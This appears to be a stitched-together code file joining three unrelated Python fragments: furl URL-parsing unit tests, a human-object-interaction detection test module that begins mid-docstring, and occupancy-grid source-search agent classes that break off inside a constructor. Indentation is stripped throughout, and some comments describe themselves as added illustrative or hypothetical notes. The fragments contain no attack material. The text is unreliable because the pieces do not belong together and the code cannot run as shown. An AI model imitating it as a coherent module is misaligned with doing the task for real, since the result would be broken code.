def test_odd_urls(self):
# Empty.
f = furl.furl('')
assert f.username is f.password is None
assert f.scheme is f.host is f.port is f.netloc is None
assert str(f.path) == ''
assert str(f.query) == ''
assert f.args == f.query.params == {}
assert str(f.fragment) == ''
assert f.url == ''
# Keep in mind that ';' is a query delimiter for both the URL
# query and the fragment query, resulting in the str(path),
# str(query), and str(fragment) values below.
url = (
"sup://example.com/:@-._~!$&'()*+,=;:@-._~!$&'()*+,=:@-._~!$&'()*+"
",==?/?:@-._~!$'()*+,;=/?:@-._~!$'()*+,;==#/?:@-._~!$&'()*+,;=")
pathstr = "/:@-._~!$&'()*+,=;:@-._~!$&'()*+,=:@-._~!$&'()*+,=="
querystr = "/?:@-._~!$'()*+,=&=/?:@-._~!$'()*+,&=="
fragmentstr = "/?:@-._~!$=&'()*+,=&="
f = furl.furl(url)
assert f.scheme == 'sup'
assert f.host == 'example.com'
assert f.port is None
assert f.netloc == 'example.com'
assert str(f.path) == pathstr
assert str(f.query) == querystr
assert str(f.fragment) == fragmentstr
# Scheme only.
f = furl.furl('sup://')
assert f.scheme == 'sup'
assert f.host is f.port is f.netloc is None
assert str(f.path) == ''
assert str(f.query) == ''
assert f.args == f.query.params == {}
assert str(f.fragment) == ''
assert f.url == 'sup://' and f.netloc is None
f.scheme = None
assert f.scheme is None and f.netloc is None and f.url == ''
f.scheme = ''
assert f.scheme == '' and f.netloc is None and f.url == '//'
# Host only.
f = furl.furl().set(host='pumps.meat')
assert f.url == 'pumps.meat' and f.netloc == f.host == 'pumps.meat'
f.host = None
assert f.url == '' and f.host is f.netloc is None
f.host = ''
assert f.url == '' and f.host == f.netloc == ''
# Port only.
f = furl.furl()
f.port = 99
assert f.url == ':99' and f.netloc is not None
f.port = None
assert f.url == '' and f.netloc is None
# urlparse.urlsplit() treats the first two '//' as the beginning
# of a netloc, even if the netloc is empty.
f = furl.furl('////path')
assert f.url == '//path' and str(f.path) == '//path'
# TODO(grun): Test more odd urls.
def test_hosts(self):
# No host.
url = 'http:///index.html'
f = furl.furl(url)
assert f.host is None and furl.furl(url).url == url
# Valid IPv4 and IPv6 addresses.
f = furl.furl('http://192.168.1.101')
f = furl.furl('http://[2001:db8:85a3:8d3:1319:8a2e:370:7348]/')
# Invalid IPv4 addresses shouldn't raise an exception because
# urlparse.urlsplit() doesn't raise an exception on invalid IPv4
# addresses.
f = furl.furl('http://1.2.3.4.5.6/')
# Invalid, but well-formed, IPv6 addresses shouldn't raise an
# exception because urlparse.urlsplit() doesn't raise an
# exception on invalid IPv6 addresses.
furl.furl('http://[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]/')
# Malformed IPv6 should raise an exception because
# urlparse.urlsplit() raises an exception in Python v2.7+. In
# Python <= 2.6, urlsplit() doesn't raise a ValueError on
# malformed IPv6 addresses.
if PYTHON_27PLUS:
with self.assertRaises(ValueError):
furl.furl('http://[0:0:0:0:0:0:0:1/')
with self.assertRaises(ValueError):
furl.furl('http://0:0:0:0:0:0:0:1]/')
def test_netlocs(self):
f = furl.furl('http://pumps.com/')
netloc = '1.2.3.4.5.6:999'
f.netloc = netloc
assert f.netloc == netloc
assert f.host == '1.2.3.4.5.6'
assert f.port == 999
netloc = '[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]:888'
f.netloc = netloc
assert f.netloc == netloc
assert f.host == '[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]'
assert f.port == 888
# Malformed IPv6 should raise an exception because
# urlparse.urlsplit() raises an exception in Python v2.7+.
if PYTHON_27PLUS:
with self.assertRaises(ValueError):
f.netloc = '[0:0:0:0:0:0:0:1'
with self.assertRaises(ValueError):
f.netloc = '0:0:0:0:0:0:0:1]'
# Invalid ports.
with self.assertRaises(ValueError):
f.netloc = '[0:0:0:0:0:0:0:1]:alksdflasdfasdf'
with self.assertRaises(ValueError):
f.netloc = 'pump2pump.org:777777777777'
# No side effects.
assert f.host == '[0:0:0:0:0:0:0:1:1:1:1:1:1:1:1:9999999999999]'
assert f.port == 888
def test_ports(self):
# Default port values.
assert furl.furl('http://www.pumps.com/').port == 80
assert furl.furl('https://www.pumps.com/').port == 443
assert furl.furl('undefined://www.pumps.com/').port is None
# Override default port values.
assert furl.furl('http://www.pumps.com:9000/').port == 9000
assert furl.furl('https://www.pumps.com:9000/').port == 9000
assert furl.furl('undefined://www.pumps.com:9000/').port == 9000
# Reset the port.
f = furl.furl('http://www.pumps.com:9000/')
f.port = None
assert f.url == 'http://www.pumps.com/'
assert f.port == 80
f = furl.furl('undefined://www.pumps.com:9000/')
f.port = None
assert f.url == 'undefined://www.pumps.com/'
assert f.port is None
# Invalid port raises ValueError with no side effects.
with self.assertRaises(ValueError):
furl.furl('http://www.pumps.com:invalid/')
url = 'http://www.pumps.com:400/'
f = furl.furl(url)
assert f.port == 400
with self.assertRaises(ValueError):
f.port = 'asdf'
assert f.url == url
f.port = 9999
with self.assertRaises(ValueError):
f.port = []
with self.assertRaises(ValueError):
f.port = -1
with self.assertRaises(ValueError):
f.port = 77777777777
assert f.port == 9999
assert f.url == 'http://www.pumps.com:9999/'
self.assertRaises(ValueError, f.set, port='asdf')
def test_add(self):
f = furl.furl('http://pumps.com/')
assert f is f.add(args={'a': 'a', 'm': 'm&m'}, path='kwl jump',
fragment_path='1', fragment_args={'f': 'frp'})
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'm', 'm&m')
assert str(f.fragment) == '1?f=frp'
assert str(f.path) == urlparse.urlsplit(f.url).path == '/kwl%20jump'
assert f is f.add(path='dir', fragment_path='23', args={'b': 'b'},
fragment_args={'b': 'bewp'})
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'm', 'm&m')
assert self._param(f.url, 'b', 'b')
assert str(f.path) == '/kwl%20jump/dir'
assert str(f.fragment) == '1/23?f=frp&b=bewp'
# Supplying both <args> and <query_params> should raise a
# warning.
with warnings.catch_warnings(True) as w1:
f.add(args={'a': '1'}, query_params={'a': '2'})
assert len(w1) == 1 and issubclass(w1[0].category, UserWarning)
assert self._param(
f.url, 'a', '1') and self._param(f.url, 'a', '2')
params = f.args.allitems()
assert params.index(('a', '1')) < params.index(('a', '2'))
def test_set(self):
f = furl.furl('http://pumps.com/kwl%20jump/dir')
assert f is f.set(args={'no': 'nope'}, fragment='sup')
assert 'a' not in f.args
assert 'b' not in f.args
assert f.url == 'http://pumps.com/kwl%20jump/dir?no=nope#sup'
# No conflict warnings between <host>/<port> and <netloc>, or
# <query> and <params>.
assert f is f.set(args={'a': 'a a'}, path='path path/dir', port='999',
fragment='moresup', scheme='sup', host='host')
assert str(f.path) == '/path%20path/dir'
assert f.url == 'sup://host:999/path%20path/dir?a=a+a#moresup'
# Path as a list of path segments to join.
assert f is f.set(path=['d1', 'd2'])
assert f.url == 'sup://host:999/d1/d2?a=a+a#moresup'
assert f is f.add(path=['/d3/', '/d4/'])
assert f.url == 'sup://host:999/d1/d2/%2Fd3%2F/%2Fd4%2F?a=a+a#moresup'
# Set a lot of stuff (but avoid conflicts, which are tested
# below).
f.set(
query_params={'k': 'k'}, fragment_path='no scrubs', scheme='morp',
host='myhouse', port=69, path='j$j*m#n', fragment_args={'f': 'f'})
assert f.url == 'morp://myhouse:69/j$j*m%23n?k=k#no%20scrubs?f=f'
# No side effects.
oldurl = f.url
with self.assertRaises(ValueError):
f.set(args={'a': 'a a'}, path='path path/dir', port='INVALID_PORT',
fragment='moresup', scheme='sup', host='host')
assert f.url == oldurl
with warnings.catch_warnings(True) as w1:
self.assertRaises(
ValueError, f.set, netloc='nope.com:99', port='NOPE')
assert len(w1) == 1 and issubclass(w1[0].category, UserWarning)
assert f.url == oldurl
# Separator isn't reset with set().
f = furl.Fragment()
f.separator = False
f.set(path='flush', args={'dad': 'nope'})
assert str(f) == 'flushdad=nope'
# Test warnings for potentially overlapping parameters.
f = furl.furl('http://pumps.com')
warnings.simplefilter("always")
# Host, port, and netloc overlap - host and port take
# precedence.
with warnings.catch_warnings(True) as w1:
f.set(netloc='dumps.com:99', host='ohay.com')
assert len(w1) == 1 and issubclass(w1[0].category, UserWarning)
assert f.host == 'ohay.com'
assert f.port == 99
with warnings.catch_warnings(True) as w2:
f.set(netloc='dumps.com:99', port=88)
assert len(w2) == 1 and issubclass(w2[0].category, UserWarning)
assert f.port == 88
with warnings.catch_warnings(True) as w3:
f.set(netloc='dumps.com:99', host='ohay.com', port=88)
assert len(w3) == 1 and issubclass(w3[0].category, UserWarning)
# Query, args, and query_params overlap - args and query_params
# take precedence.
with warnings.catch_warnings(record=True) as w4:
f.set(query='yosup', args={'a': 'a', 'b': 'b'})
assert len(w4) == 1 and issubclass(w4[0].category, UserWarning)
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'b', 'b')
with warnings.catch_warnings(record=True) as w5:
f.set(query='yosup', query_params={'a': 'a', 'b': 'b'})
assert len(w5) == 1 and issubclass(w5[0].category, UserWarning)
assert self._param(f.url, 'a', 'a')
assert self._param(f.url, 'b', 'b')
with warnings.catch_warnings(record=True) as w6:
f.set(args={'a': 'a', 'b': 'b'}, query_params={'c': 'c', 'd': 'd'})
assert len(w6) == 1 and issubclass(w6[0].category, UserWarning)
projected RoI
"""
rois = im_rois.astype(np.float, copy=False) * scales
levels = np.zeros((im_rois.shape[0], 1), dtype=np.int)
return rois, levels
def _add_multilevel_rois_for_test(blobs, name):
"""Distributes a set of RoIs across FPN pyramid levels by creating new level
specific RoI blobs.
Arguments:
blobs (dict): dictionary of blobs
name (str): a key in 'blobs' identifying the source RoI blob
Returns:
[by ref] blobs (dict): new keys named by `name + 'fpn' + level`
are added to dict each with a value that's an R_level x 5 ndarray of
RoIs (see _get_rois_blob for format)
"""
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn_utils.map_rois_to_fpn_levels(blobs[name][:, 1:5], lvl_min, lvl_max)
fpn_utils.add_multilevel_roi_blobs(
blobs, name, blobs[name], lvls, lvl_min, lvl_max
)
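# Illustrative note (an assumption based on the docstring and FPN utilities above, not
# something this file asserts): with ROI_MIN_LEVEL=2 and ROI_MAX_LEVEL=5, a call such as
#   _add_multilevel_rois_for_test(blobs, 'rois')
# would add per-level blobs like 'rois_fpn2' ... 'rois_fpn5', plus an index blob used to
# restore the original RoI ordering (cf. 'boxes_idx_restore_int32' further below).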
def _get_blobs(im, rois, target_scale, target_max_size):
"""Convert an image and RoIs within that image into network inputs."""
blobs = {}
blobs['data'], im_scale, blobs['im_info'] = \
blob_utils.get_image_blob(im, target_scale, target_max_size)
if rois is not None:
blobs['rois'] = _get_rois_blob(rois, im_scale)
return blobs, im_scale
# -------------------------- HOI ----------------------------
def im_detect_hoi(model, boxes, scores, human_count, im_info, blob_conv, entry=None, vcoco_heatmaps=None):
hoi_blob_in = get_hoi_blob_names(is_training=False)
# im_info.shape = (1, 3) h, w, scale
im_scale = im_info[0, 2]
# project boxes to re-sized image size
hoi_blob_in['boxes'] = np.hstack((np.zeros((boxes.shape[0], 1), dtype=boxes.dtype),
boxes * im_scale))
hoi_blob_in['scores'] = scores
human_index = np.arange(boxes.shape[0])[:human_count]
object_index = np.arange(boxes.shape[0])[human_count:]
interaction_human_inds, interaction_target_object_inds \
= np.repeat(human_index, object_index.size), np.tile(object_index - human_count, human_index.size)
hoi_blob_in['human_index'] = human_index
hoi_blob_in['target_object_index'] = object_index
hoi_blob_in['interaction_human_inds'] = interaction_human_inds
hoi_blob_in['interaction_target_object_inds'] = interaction_target_object_inds
# Add multi-level rois for FPN
if cfg.FPN.MULTILEVEL_ROIS:
_add_multilevel_rois_for_test(hoi_blob_in, 'boxes')
# if no human box is detected, do not use the hoi head; just return NaN
if human_index.size > 0:
hoi_blob_out = model.module.hoi_net(blob_conv, hoi_blob_in, im_info, vcoco_heatmaps)
# ipdb.set_trace()
# if entry:
# test_hoi_fill_hoi_blob_from_gt(hoi_blob_out, entry, im_scale)
hoi_res = hoi_res_gather(hoi_blob_out, im_scale, entry)
else:
# ToDo: any problem here?
hoi_res = dict(
agents=np.full((1, 4 + cfg.VCOCO.NUM_ACTION_CLASSES), np.nan),
roles=np.full((1, 5 * cfg.VCOCO.NUM_ACTION_CLASSES, cfg.VCOCO.NUM_TARGET_OBJECT_TYPES), np.nan),
)
return hoi_res
def hoi_res_gather(hoi_blob, im_scale, entry=None):
'''
Convert predicted score and location to triplets
:param hoi_blob:
:param im_scale:
:param entry:
:return:
'''
# ToDo: modify comments
num_action_classes = cfg.VCOCO.NUM_ACTION_CLASSES
num_target_object_types = cfg.VCOCO.NUM_TARGET_OBJECT_TYPES
human_action_score = F.sigmoid(hoi_blob['human_action_score']).cpu().numpy()
human_action_bbox_pred = hoi_blob['human_action_bbox_pred'].cpu().numpy()
interaction_action_score = F.sigmoid(hoi_blob['interaction_action_score']).cpu().numpy()
human_score = hoi_blob['scores'][hoi_blob['human_index']]
object_score = hoi_blob['scores'][hoi_blob['target_object_index']]
# scale to original image size when testing
boxes = hoi_blob['boxes'][:, 1:] / im_scale
# For actions that do not interact with an object, action_score is s_h * s^a_h.
# For triplets (actions that interact with an object), action_score is s_h * s_o * s^a_h * g^a_h,o.
# We use a mask to choose the appropriate score.
action_mask = np.array(cfg.VCOCO.ACTION_MASK)
triplet_action_mask = np.tile(action_mask.transpose((1, 0)), (human_action_score.shape[0], 1, 1))
# For actions that do not interact with any object (e.g., smile, run),
# we rely on s^a_h; the interaction output s^a_h_o is not used.
human_action_pair_score = human_score[:, np.newaxis] * human_action_score
# in case there are no role-objects
if hoi_blob['target_object_index'].size > 0:
# transform from (human num, object num, action_num) to
# (human_num*action_num*num_target_object_types, object_num)
interaction_action_score = \
interaction_action_score.reshape(human_score.size, object_score.size, -1).transpose(0, 2, 1)
interaction_action_score = np.repeat(interaction_action_score, num_target_object_types, axis=1
).reshape(-1, object_score.size)
# get target localization term g^a_h,o
target_localization_term = target_localization(boxes, hoi_blob['human_index'],
hoi_blob['target_object_index'], human_action_bbox_pred)
# find the object box that maximizes S^a_h,o
# `for each human / action pair we find the object box that maximizes S_h_o^a`
object_action_score = object_score * interaction_action_score * target_localization_term
choosed_object_inds = np.argmax(object_action_score, axis=-1)
# choose corresponding target_localization_term
target_localization_term = target_localization_term[np.arange(choosed_object_inds.size), choosed_object_inds]
# ToDo: choose top-50
# triplet score S^a_h,o
triplet_action_score = \
np.repeat(human_score, num_action_classes * num_target_object_types) * \
object_score[choosed_object_inds] * \
np.repeat(human_action_score, num_target_object_types, axis=1).ravel() * \
target_localization_term
# transform to (human_num, action_num, num_target_object_types)
triplet_action_score = triplet_action_score.reshape(human_action_score.shape[0], num_action_classes,
num_target_object_types)
# ToDo: thresh
# triplet_action_score[triplet_action_mask <= cfg.TEST.SCORE_THRESH] = np.nan
if entry:
# assert triplet_action_score.shape == entry['gt_role_id'][hoi_blob['human_index']].shape
for i in range(len(triplet_action_score.shape)):
pass
# assert np.all(np.where(triplet_action_score > 0.9)[i] ==
# np.where(entry['gt_role_id'][hoi_blob['human_index']] > -1)[i])
# choose appropriate score
# ToDo: any problem here?
# Not every action that is defined to interact with objects will have a
# corresponding object in a given image, yet triplet_action_score always
# has an object box. Should a threshold (or some other method) be used to
# choose between human_action_pair_score and the triplet score,
# or will wrong results simply be excluded when AP is calculated?
# action_score = np.zeros(human_action_score.shape)
# action_score[human_action_mask == 0] = human_action_pair_score[human_action_mask == 0]
# action_score[human_action_mask == 1] = np.amax(triplet_action_score, axis=-1)[human_action_mask == 1]
# set triplet action score don't interact with object to zero
# triplet_action_score[triplet_action_mask == 0] = np.nan
triplet_action_score[triplet_action_mask == 0] = -1
top_k_value = triplet_action_score.flatten()[
np.argpartition(triplet_action_score, -cfg.VCOCO.KEEP_TOP_NUM, axis=None)[-cfg.VCOCO.KEEP_TOP_NUM]]
triplet_action_score[triplet_action_score <= top_k_value] = np.nan
# get corresponding box of role-objects
choosed_object_inds = choosed_object_inds.reshape(human_action_score.shape[0], num_action_classes,
num_target_object_types)
choosed_objects = boxes[hoi_blob['target_object_index']][choosed_object_inds]
else:
# if no objects are predicted, the triplet action score won't be used
triplet_action_score = np.full((1, num_action_classes, num_target_object_types), np.nan)
choosed_objects = np.zeros((1, num_action_classes, num_target_object_types, 4))
action_score = human_action_pair_score
# ToDo: threshold
# action_score[action_score <= cfg.TEST.SCORE_THRESH] = np.nan
# keep consistent with v-coco eval code
# agents: box coordinates + 26 action score.
# roles: 26 * (role object coordinates + role-action score) * num_target_object_types
agents = np.hstack((boxes[hoi_blob['human_index']], action_score))
roles = np.concatenate((choosed_objects, triplet_action_score[..., np.newaxis]), axis=-1)
roles = np.stack([roles[:, :, i, :].reshape(-1, num_action_classes * 5) for i in range(num_target_object_types)], axis=-1)
return_dict = dict(
# image_id=i
agents=agents,
roles=roles
)
return return_dict
def target_localization(boxes, human_index, object_index, target_location):
"""
Target localization term in paper, g^a_h,o
Measure compatibility between human-object relative location and
target location, which is predicted by hoi-head
:param boxes:
:param human_index:
:param object_index:
:param target_location:
:return:
"""
human_boxes = boxes[human_index]
object_boxes = boxes[object_index]
num_action_classes = cfg.VCOCO.NUM_ACTION_CLASSES
num_target_object_types = cfg.VCOCO.NUM_TARGET_OBJECT_TYPES
# relative location between every human box and object box
# ToDo: add cfg.MODEL.BBOX_REG_WEIGHTS
relative_location = box_utils.bbox_transform_inv(
np.repeat(human_boxes, object_boxes.shape[0], axis=0),
np.tile(object_boxes, (human_boxes.shape[0], 1))
).reshape(human_boxes.shape[0], object_boxes.shape[0], 4)
# reshape target location same shape as relative location
target_location = target_location.reshape(-1, num_action_classes * num_target_object_types, 4)
# tile to human_num * (num_action_classes * num_target_object_types * object_num) * 4
relative_location, target_location = \
np.tile(relative_location, (1, num_action_classes * num_target_object_types, 1)), \
np.repeat(target_location, relative_location.shape[1], axis=1)
compatibility = np.sum(np.square((relative_location - target_location)), axis=-1)
# It seems the paper makes a mistake here
compatibility = np.exp(-compatibility / (2 * cfg.VCOCO.TARGET_SIGMA ** 2))
# reshape to (human_num * num_action_classes * num_target_object_types, object_num)
compatibility = compatibility.reshape(human_index.size * num_action_classes * num_target_object_types,
object_index.size)
return compatibility
# ------------------test interact net code ------------------
# ToDo: will be cleaned
def test_hoi_fill_hoi_blob_from_gt(hoi_blob, entry, im_scale):
"""['boxes', 'human_index', 'target_object_index', 'interaction_human_inds',
'interaction_target_object_inds', 'interaction_batch_idx', 'human_action_labels',
'human_action_targets', 'action_target_weights', 'interaction_action_labels',
'boxes_fpn2', 'boxes_fpn3', 'boxes_fpn4', 'boxes_fpn5', 'boxes_idx_restore_int32',
'human_action_score', 'human_action_bbox_pred', 'interaction_action_score']"""
hoi_blob['boxes'] = np.hstack((np.zeros((entry['boxes'].shape[0], 1), dtype=hoi_blob['boxes'].dtype),
entry['boxes'])) * im_scale
hoi_blob['scores'] = np.ones(entry['boxes'].shape[0])
human_index = np.where(entry['gt_actions'][:, 0] > -1)[0]
# any object could be a target object
target_object_index = np.arange(entry['boxes'].shape[0], dtype=human_index.dtype)
interaction_human_inds, interaction_target_object_inds \
= np.repeat(np.arange(human_index.size), target_object_index.size), \
np.tile(np.arange(target_object_index.size), human_index.size)
hoi_blob['human_index'] = human_index
hoi_blob['target_object_index'] = target_object_index
hoi_blob['interaction_human_inds'] = interaction_human_inds
hoi_blob['interaction_target_object_inds'] = interaction_target_object_inds
human_action_score = entry['gt_actions'][human_index]
hoi_blob['human_action_score'] = torch.from_numpy(human_action_score).cuda()
action_label_mat = generate_action_mat(entry['gt_role_id'])
triplet_label = action_label_mat[human_index[interaction_human_inds],
target_object_index[interaction_target_object_inds]]
hoi_blob['interaction_action_score'] = torch.from_numpy(triplet_label).cuda()
human_action_bbox_pred, _ = \
_compute_action_targets(entry['boxes'][human_index], entry['boxes'],
entry['gt_role_id'][human_index])
hoi_blob['human_action_bbox_pred'] = torch.from_numpy(human_action_bbox_pred).cuda()
def generate_action_mat(gt_role_id):
'''
Generate a matrix storing action triplets.
:param gt_role_id:
:return: action_mat; axis 0 is the person id, axis 1 the role-object id,
axis 2 the action id and axis 3 the role type
'''
mat = np.zeros((gt_role_id.shape[0], gt_role_id.shape[0], cfg.VCOCO.NUM_ACTION_CLASSES, gt_role_id.shape[-1]), dtype=np.float32)
obj_ids = gt_role_id[np.where(gt_role_id > -1)]
human_ids, action_cls, role_cls = np.where(gt_role_id > -1)
assert role_cls.size == human_ids.size == action_cls.size == obj_ids.size
mat[human_ids, obj_ids, action_cls, role_cls] = 1
return mat
def _compute_action_targets(person_rois, gt_boxes, role_ids):
'''
Compute action targets
:param person_rois: rois assigned to gt acting-human, n * 4
:param gt_boxes: all gt boxes in one image
:param role_ids: person_rois_num * action_cls_num * num_target_object_types, store person rois corresponding role object ids
:return:
'''
assert person_rois.shape[0] == role_ids.shape[0]
# should use cfg.MODEL.BBOX_REG_WEIGHTS?
# calculate targets between every person rois and every gt_boxes
targets = box_utils.bbox_transform_inv(np.repeat(person_rois, gt_boxes.shape[0], axis=0),
np.tile(gt_boxes, (person_rois.shape[0], 1)),
(1., 1., 1., 1.)).reshape(person_rois.shape[0], gt_boxes.shape[0], -1)
# human action targets is (person_num: 16, action_num: 26, role_cls: 2, relative_location: 4)
# don't use np.inf, so that actions without target objects can be kept
human_action_targets = np.zeros((role_ids.shape[0], role_ids.shape[1],
role_ids.shape[2], 4), dtype=np.float32)
action_target_weights = np.zeros_like(human_action_targets, dtype=np.float32)
# get action targets relative location
human_action_targets[np.where(role_ids > -1)] = \
targets[np.where(role_ids > -1)[0], role_ids[np.where(role_ids > -1)].astype(int)]
action_target_weights[np.where(role_ids > -1)] = 1.
return human_action_targets.reshape(-1, cfg.VCOCO.NUM_ACTION_CLASSES * 2 * 4), \
action_target_weights.reshape(-1, cfg.VCOCO.NUM_ACTION_CLASSES * 2 * 4)
# -------------------------------
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 12 16:04:45 2019
@author: 13383861
"""
import sys
sys.path.append('.')
import os
import time
from abc import ABC, abstractmethod
import numpy as np
from OccupancyGrid.Agents.BaseOccupancyGridAgent import BaseGridAgent
from Utils.Vector3r import Vector3r
from Utils.UE4Grid import UE4Grid
from Utils.BeliefMap import BeliefMapComponent
from Utils.BeliefMapVector import BeliefVectorMultipleSources
from Utils.BatteryDBN import DefaultStochasticBatteryHMM
class SimpleGridAgent(BaseGridAgent):
'''
This agent is responsible for navigating a discrete 2-dimensional grid (assumed to already be mapped) in order to localize
a source of evidence. The agent is equipped with appropriate sensors to carry out this task. This is a very simple instantiation:
the agent neither communicates nor has a battery.
'''
def __init__(self, grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents = [], comms_radius = 1000, logged = True):
super().__init__(grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, other_active_agents, comms_radius, logged)
#for simple grid agent assume it is in correct grid square
self.search_terminator = search_terminator
def reset(self):
pass
def _execute_action(self, action):
#This should always be a move; recharging is incorporated in derived agents
if action[0] == 'move':
#need to implement this: first have the agent coordinate with others to check whether they intend to move to the current
#grid location
# if action[1] in other_agent_positions:
# #this simulates a lower-level collision avoidance agent instructing
# #robot to not crash into others
# return None
self.previous_pos_intended = self.current_pos_intended
self.current_pos_intended = action[1]
else:
raise Exception("Invalid action requested by {}: {}".format(self.agent_name, action))
# def coord_with_other(self, other_rav_name):
#
# '''
# Coordinate with other rav by requesting their measurement list and sending our own measurement list first write own measurement list to file.
# '''
#
# log_msg_to_file(str(other_rav_name) + ' ' + str(self.timestep), "info", "comms", self._logged)
# self.log_msg_to_cmd("Coordinating with: " + other_rav_name, "debug", "cmd_line", self._logged)
# observations_from_other_agents = self._read_observations(OccupancyGridAgent.ObservationDir + "/{}.csv".format(other_rav_name))
# #update observation manager and also observation file
# for observation_from_other_agent in observations_from_other_agents:
# new_observation = self.observation_manager.update_with_observation(observation_from_other_agent)
# if new_observation:
# #update observations not already observed
# self.log_msg_to_cmd("Updating with observation " + str(new_observation) + " from " + other_rav_name, "debug", "cmd_line",self._logged)
# self.update_observations_file(self.observations_file_loc, new_observation)
# log_msg_to_file(str(observation_from_other_agent), "info", "observations")
#
# self.current_belief_map = create_belief_map_from_observations(self.grid, self.agent_name, self.observation_manager.get_all_observations(), self.current_belief_map.get_prior())
# self.others_coordinated_this_timestep.append(other_rav_name)
def _select_action(self):
return self.move_from_bel_map_callable(self.current_belief_map, self.current_pos_intended, self.explored_grid_locs)
def iterate_next_timestep(self, other_agent_positions = []):
'''
At each discrete timestep, the agent chooses an action to take, executes it and then perceives the environment in which it is operating.
The agent cannot move to a location which another agent is occupying (or is planning to occupy on the same timestep).
'''
#choose an action and send it to the robot to perform it
self.actuate()
#perceive the new state of the environment using the agent's sensor(s)
self.perceive()
#record the sensor measurement in a file
self.record_sensor_measurement()
#update the agent's belief
self.update_belief(self.latest_observation)
#coordinate with other agents if possible
#in future implement a coordination strategy
for other_active_agent in self.other_active_agents:
if self.can_coord_with_other(other_active_agent, self.comms_radius):
self.coord_with_other(other_active_agent)
def coord_with_all_others(self):
'''
Attempt to coordinate with all active other agents
'''
for other_active_agent in self.other_active_agents:
if self.can_coord_with_other(other_active_agent, self.comms_radius):
self.coord_with_other(other_active_agent)
def coord_with_other(self, other_active_agent):
'''Requests observations from other active agents and updates this agents belief with the observations
received from other agents'''
#request observations from other agents
other_agent_observations = self.request_other_agent_observations(other_active_agent)
#update current agent belief based on other agents belief
for other_agent_observation in other_agent_observations:
self.update_belief(other_agent_observation)
def find_source(self) -> BeliefMapComponent:
'''
Assuming there are 0 or 1 sources present in the available set of grid locations,
this method instructs the agent to attempt to locate it.
This is done by executing the following sequence of abstract actions:
1). Initialize the belief map given the information the agent is initialized with
2). Choose an action to explore the region using the strategy provided by move_from_bel_map_callable
3). Gather sensor data using a sensor model
4). Update agent belief based on the gathered sensor data
5). Terminate if the termination criteria are met (based on the agent's belief), else continue from 2.
This is not suitable for multi-agent simulations, since agents need to coordinate on each time step.
Instead, these steps will need to be executed for each agent externally, which should be easy to do with the
iterate_next_timestep method.
'''
while not self.search_terminator.should_end_search(self.current_belief_map):
if self._end_search_prematurely:
break
#this actuates, perceives, updates belief map in one step
self.iterate_next_timestep()
if self.timestep % 1 == 0:
print("Timestep: {}, Location explored: {}".format(self.timestep, self.current_pos_intended))
#self.current_belief_map.save_visualisation("D:/OccupancyGrid/Data/BeliefMapData/BeliefEvolutionImages/img{:03.0f}.png".format(self.timestep))
#return the most likely component of the belief map. This could be the component that represents the source not being present at all
print(self.current_belief_map.current_belief_vector.get_estimated_state())
print("source located at {}".format(self.current_belief_map.get_ith_most_likely_component(1).grid_loc))
#return self.current_belief_map.get_most_likely_component()
return self.current_belief_map.get_ith_most_likely_component(1)
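# Interpretive note (added summary, not original to this file): steps 2-4 listed in the
# find_source docstring map onto iterate_next_timestep as follows - step 2 is
# self.actuate() (driven by move_from_bel_map_callable via _select_action), step 3 is
# self.perceive() plus self.record_sensor_measurement(), and step 4 is
# self.update_belief(); step 5 is the search_terminator.should_end_search() check in the
# while loop of find_source above.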
class MultipleSourceDetectingGridAgent(SimpleGridAgent):
'''
This agent extends the simple grid agent and is designed to locate multiple sources (or possibly none) of evidence located in
a scenario.
'''
def __init__(self, grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents = [], comms_radius = 1000, logged = True):
super().__init__(grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents, comms_radius, logged)
#check that the estimated state can be suitably modified to remove an observed source of evidence
assert issubclass(self.current_belief_map.current_belief_vector.__class__, BeliefVectorMultipleSources)
def reset(self):
pass
def find_sources(self, max_no_sources):
'''
Given an upper limit on the number of sources available in the agent's environment, executes a control loop to locate
the sources, or returns once the given number of sources has been found. This is not suitable for multi-agent simulations, where agents
should coordinate across each timestep.
'''
self.max_no_sources = max_no_sources
#the locations of sources of evidence that have already been successfully located
self.located_sources = []
while len(self.located_sources) < self.max_no_sources:
next_source = self.find_source()
#check if the source is deemed to not be present at all
#if so, break the loop
#This is bad practice - try and fix in future
print("next_source: ", next_source)
if next_source.grid_loc == Vector3r(-1, -1):
break
#given the next located source, append it to the list of located sources and then
#modify the belief vector to set the probability of subsequent sources to be found at
#the given location to be zero.
self.located_sources.append(next_source)
#
self.current_belief_map.mark_source_as_located(next_source.grid_loc)
#return the list of located sources to the user
return self.located_sources
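# Hypothetical usage sketch (the grid, move strategy, sensor simulator, belief-map class,
# initial belief and terminator below are placeholder names; concrete objects would come
# from the Utils/OccupancyGrid packages imported at the top of this file):
#
#   agent = MultipleSourceDetectingGridAgent(
#       grid, Vector3r(0, 0), move_strategy, height=10, agent_name='agent1',
#       occupancy_sensor_simulator=sensor_sim, belief_map_class=belief_map_cls,
#       init_belief_map=initial_belief, search_terminator=terminator)
#   located_sources = agent.find_sources(max_no_sources=2)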
class MultipleSourceDetectingGridAgentWithBattery(MultipleSourceDetectingGridAgent):
'''
This agent extends the simple grid agent and is designed to locate multiple sources (or possibly none) of evidence located in
a scenario. It includes a battery model.
'''
def __init__(self, grid, initial_pos, move_from_bel_map_callable, height, agent_name, occupancy_sensor_simulator, battery_capacity_simulator, belief_map_class, init_belief_map, search_terminator, other_active_agents = [], comms_radius = 1000, logged = True, no_battery_levels = 11, charging_locations = None, operational_speed = 1):
#default number of battery levels is 0-10 = 11 levels
